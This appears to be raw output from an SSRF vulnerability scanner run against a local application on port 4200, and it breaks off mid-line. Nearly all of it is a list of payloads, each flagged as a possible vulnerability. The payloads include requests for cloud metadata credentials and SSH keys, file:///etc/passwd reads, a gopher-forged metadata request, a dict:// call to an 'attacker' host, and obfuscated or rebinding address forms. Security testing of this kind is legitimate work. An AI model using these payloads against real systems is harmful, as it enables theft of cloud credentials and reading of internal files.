`http://localhost:4200/?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` _(POST)_ +- Testing: `http://localhost:4200/?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` _(POST)_ +- Testing: `http://localhost:4200/?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` _(POST)_ +- Testing: `http://localhost:4200/?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` _(POST)_ +- Testing: `http://localhost:4200/?url=dict%3A%2F%2Fattacker%3A11111` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=dict%3A%2F%2Fattacker%3A11111` _(POST)_ +- Testing: `http://localhost:4200/?url=file%3A%2F%2F%2Fetc%2Fpasswd` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=file%3A%2F%2F%2Fetc%2Fpasswd` _(POST)_ +- Testing: `http://localhost:4200/?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` _(POST)_ +- Testing: `http://localhost:4200/?url=file%3A%2F%2Fpath%2Fto%2Ffile` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=file%3A%2F%2Fpath%2Fto%2Ffile` _(POST)_ +- Testing: `http://localhost:4200/?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` _(POST)_ +- Testing: `http://localhost:4200/?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` _(POST)_ +- Testing: `http://localhost:4200/?url=0.0.0.0%3A22` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0.0.0.0%3A22` _(POST)_ +- Testing: `http://localhost:4200/?url=0.0.0.0%3A443` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0.0.0.0%3A443` _(POST)_ +- Testing: `http://localhost:4200/?url=0.0.0.0%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0.0.0.0%3A80` _(POST)_ +- Testing: `http://localhost:4200/?url=0.0.0.0%3A3389` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0.0.0.0%3A3389` _(POST)_ +- Testing: `http://localhost:4200/?url=0000%3A%3A1%3A22` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0000%3A%3A1%3A22` _(POST)_ +- Testing: `http://localhost:4200/?url=0000%3A%3A1%3A25` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0000%3A%3A1%3A25` _(POST)_ +- Testing: `http://localhost:4200/?url=0000%3A%3A1%3A3128` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0000%3A%3A1%3A3128` _(POST)_ +- Testing: `http://localhost:4200/?url=0000%3A%3A1%3A3389` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0000%3A%3A1%3A3389` _(POST)_ +- Testing: `http://localhost:4200/?url=0251.00376.000251.0000376` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0251.00376.000251.0000376` _(POST)_ +- Testing: `http://localhost:4200/?url=0x41414141A9FEA9FE` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0x41414141A9FEA9FE` _(POST)_ +- Testing: `http://localhost:4200/?url=0xA9.0xFE.0xA9.0xFE` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0xA9.0xFE.0xA9.0xFE` _(POST)_ +- Testing: `http://localhost:4200/?url=0xA9FEA9FE` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0xA9FEA9FE` _(POST)_ +- Testing: `http://localhost:4200/?url=0xa9fea9fe` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0xa9fea9fe` _(POST)_ +- Testing: `http://localhost:4200/?url=100.100.100.200%2Flatest%2Fmeta-data%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=100.100.100.200%2Flatest%2Fmeta-data%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` _(POST)_ +- Testing: `http://localhost:4200/?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.0` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.0` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1%3A22` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1%3A22` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1%3A2379%2Fversion` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1%3A2379%2Fversion` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1%3A443` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1%3A443` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1%3A80` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1%3A3389` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1%3A3389` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1%3A8000` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1%3A8000` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1%3A9901` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1%3A9901` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1%3A8001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1%3A8001` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1%3A8444` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1%3A8444` _(POST)_ +- Testing: `http://localhost:4200/?url=127.1.1.1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.1.1.1` _(POST)_ +- Testing: `http://localhost:4200/?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` _(POST)_ +- Testing: `http://localhost:4200/?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` _(POST)_ +- Testing: `http://localhost:4200/?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` _(POST)_ +- Testing: `http://localhost:4200/?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` _(POST)_ +- Testing: `http://localhost:4200/?url=127.127.127.127.nip.io` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.127.127.127.nip.io` _(POST)_ +- Testing: `http://localhost:4200/?url=169.254.169.254.xip.io` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=169.254.169.254.xip.io` _(POST)_ +- Testing: `http://localhost:4200/?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` _(POST)_ +- Testing: `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fmeta-data%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fmeta-data%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` _(POST)_ +- Testing: `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` _(POST)_ +- Testing: `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` _(POST)_ +- Testing: `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` _(POST)_ +- Testing: `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` _(POST)_ +- Testing: `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` _(POST)_ +- Testing: `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` _(POST)_ +- Testing: `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` _(POST)_ +- Testing: `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fuser-data` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fuser-data` _(POST)_ +- Testing: `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=192.0.0.192%2Flatest%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=192.0.0.192%2Flatest%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=192.0.0.192%2Flatest%2Fattributes%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=192.0.0.192%2Flatest%2Fattributes%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=192.0.0.192%2Flatest%2Fmeta-data%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=192.0.0.192%2Flatest%2Fmeta-data%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=192.0.0.192%2Flatest%2Fuser-data%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=192.0.0.192%2Flatest%2Fuser-data%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=3232235521` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=3232235521` _(POST)_ +- Testing: `http://localhost:4200/?url=3232235777` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=3232235777` _(POST)_ +- Testing: `http://localhost:4200/?url=425.510.425.510` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=425.510.425.510` _(POST)_ +- Testing: `http://localhost:4200/?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` _(POST)_ +- Testing: `http://localhost:4200/?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` _(POST)_ +- Testing: `http://localhost:4200/?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` _(POST)_ +- Testing: `http://localhost:4200/?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` _(POST)_ +- Testing: `http://localhost:4200/?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` _(POST)_ +- Testing: `http://localhost:4200/?url=%5B%3A%3A%5D` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%5B%3A%3A%5D` _(POST)_ +- Testing: `http://localhost:4200/?url=%5B%3A%3A%5D%3A22` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%5B%3A%3A%5D%3A22` _(POST)_ +- Testing: `http://localhost:4200/?url=%5B%3A%3A%5D%3A25` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%5B%3A%3A%5D%3A25` _(POST)_ +- Testing: `http://localhost:4200/?url=%5B%3A%3A%5D%3A3128` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%5B%3A%3A%5D%3A3128` _(POST)_ +- Testing: `http://localhost:4200/?url=%5B%3A%3A%5D%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%5B%3A%3A%5D%3A80` _(POST)_ +- Testing: `http://localhost:4200/?url=%5B%3A%3A%5D%3A3389` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%5B%3A%3A%5D%3A3389` _(POST)_ +- Testing: `http://localhost:4200/?url=%5B%3A%3A%5D%3A8000` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%5B%3A%3A%5D%3A8000` _(POST)_ +- Testing: `http://localhost:4200/?url=%5B%3A%3A%5D%3A8001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%5B%3A%3A%5D%3A8001` _(POST)_ +- Testing: `http://localhost:4200/?url=%5B%3A%3A%5D%3A8444` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%5B%3A%3A%5D%3A8444` _(POST)_ +- Testing: `http://localhost:4200/?url=%5B%3A%3A%5D%3A9901` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%5B%3A%3A%5D%3A9901` _(POST)_ +- Testing: `http://localhost:4200/?url=app-169-254-169-254.nip.io` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=app-169-254-169-254.nip.io` _(POST)_ +- Testing: `http://localhost:4200/?url=customer2-app-169-254-169-254.nip.io` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=customer2-app-169-254-169-254.nip.io` _(POST)_ +- Testing: `http://localhost:4200/?url=instance-data` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=instance-data` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A22` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A22` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A443` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A443` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A80` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A3389` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A3389` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A8000` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A8000` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A8001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A8001` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A8444` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A8444` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A9901` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A9901` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost.localdomain` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost.localdomain` _(POST)_ +- Testing: `http://localhost:4200/?url=loopback` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=loopback` _(POST)_ +- Testing: `http://localhost:4200/?url=loopback%3A22` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=loopback%3A22` _(POST)_ +- Testing: `http://localhost:4200/?url=loopback%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=loopback%3A80` _(POST)_ +- Testing: `http://localhost:4200/?url=loopback%3A443` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=loopback%3A443` _(POST)_ +- Testing: `http://localhost:4200/?url=loopback%3A3389` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=loopback%3A3389` _(POST)_ +- Testing: `http://localhost:4200/?url=loopback%3A8000` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=loopback%3A8000` _(POST)_ +- Testing: `http://localhost:4200/?url=loopback%3A9901` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=loopback%3A9901` _(POST)_ +- Testing: `http://localhost:4200/?url=loopback%3A8001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=loopback%3A8001` _(POST)_ +- Testing: `http://localhost:4200/?url=loopback%3A8444` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=loopback%3A8444` _(POST)_ +- Testing: `http://localhost:4200/?url=ipcop.localdomain%3A8443` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=ipcop.localdomain%3A8443` _(POST)_ +- Testing: `http://localhost:4200/?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` _(POST)_ +- Testing: `http://localhost:4200/?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` _(POST)_ +- Testing: `http://localhost:4200/?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` _(POST)_ +- Testing: `http://localhost:4200/?url=metadata.nicob.net` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=metadata.nicob.net` _(POST)_ +- Testing: `http://localhost:4200/?url=owasp.org.169.254.169.254.nip.io` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=owasp.org.169.254.169.254.nip.io` _(POST)_ +- Testing: `http://localhost:4200/?url=ssrf-169.254.169.254.localdomain.pw` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=ssrf-169.254.169.254.localdomain.pw` _(POST)_ +- Testing: `http://localhost:4200/?url=ssrf-cloud.localdomain.pw` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=ssrf-cloud.localdomain.pw` _(POST)_ +- Testing: `http://localhost:4200/?url=www.owasp.org.1ynrnhl.xip.io` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=www.owasp.org.1ynrnhl.xip.io` _(POST)_ +- Testing: `http://localhost:4200/?url=127.1%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.1%3A80` _(POST)_ +- Testing: `http://localhost:4200/?url=%5B%3A%3A%5D%3A80%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%5B%3A%3A%5D%3A80%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=%5B%3A%3A%5D%3A25%2F%20SMTP` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%5B%3A%3A%5D%3A25%2F%20SMTP` _(POST)_ +- Testing: `http://localhost:4200/?url=%5B%3A%3A%5D%3A3128%2F%20Squid` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%5B%3A%3A%5D%3A3128%2F%20Squid` _(POST)_ +- Testing: `http://localhost:4200/?url=%5B0000%3A%3A1%5D%3A80%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%5B0000%3A%3A1%5D%3A80%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` _(POST)_ +- Testing: `http://localhost:4200/?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` _(POST)_ +- Testing: `http://localhost:4200/?url=2130706433%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=2130706433%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=3232235521%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=3232235521%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=3232235777%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=3232235777%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=0x7f000001%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0x7f000001%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=0xc0a80014%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0xc0a80014%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=%7Bdomain%7D%40127.0.0.1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%7Bdomain%7D%40127.0.0.1` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1%23%7Bdomain%7D` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1%23%7Bdomain%7D` _(POST)_ +- Testing: `http://localhost:4200/?url=%7Bdomain%7D.127.0.0.1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%7Bdomain%7D.127.0.0.1` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1%2F%7Bdomain%7D` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1%2F%7Bdomain%7D` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` _(POST)_ +- Testing: `http://localhost:4200/?url=%7Bdomain%7D%40localhost` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%7Bdomain%7D%40localhost` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%23%7Bdomain%7D` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%23%7Bdomain%7D` _(POST)_ +- Testing: `http://localhost:4200/?url=%7Bdomain%7D.localhost` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%7Bdomain%7D.localhost` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%2F%7Bdomain%7D` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%2F%7Bdomain%7D` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%2F%3Fd%3D%7Bdomain%7D` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%2F%3Fd%3D%7Bdomain%7D` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1%2500%7Bdomain%7D` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1%2500%7Bdomain%7D` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1%3F%7Bdomain%7D` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1%3F%7Bdomain%7D` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` + 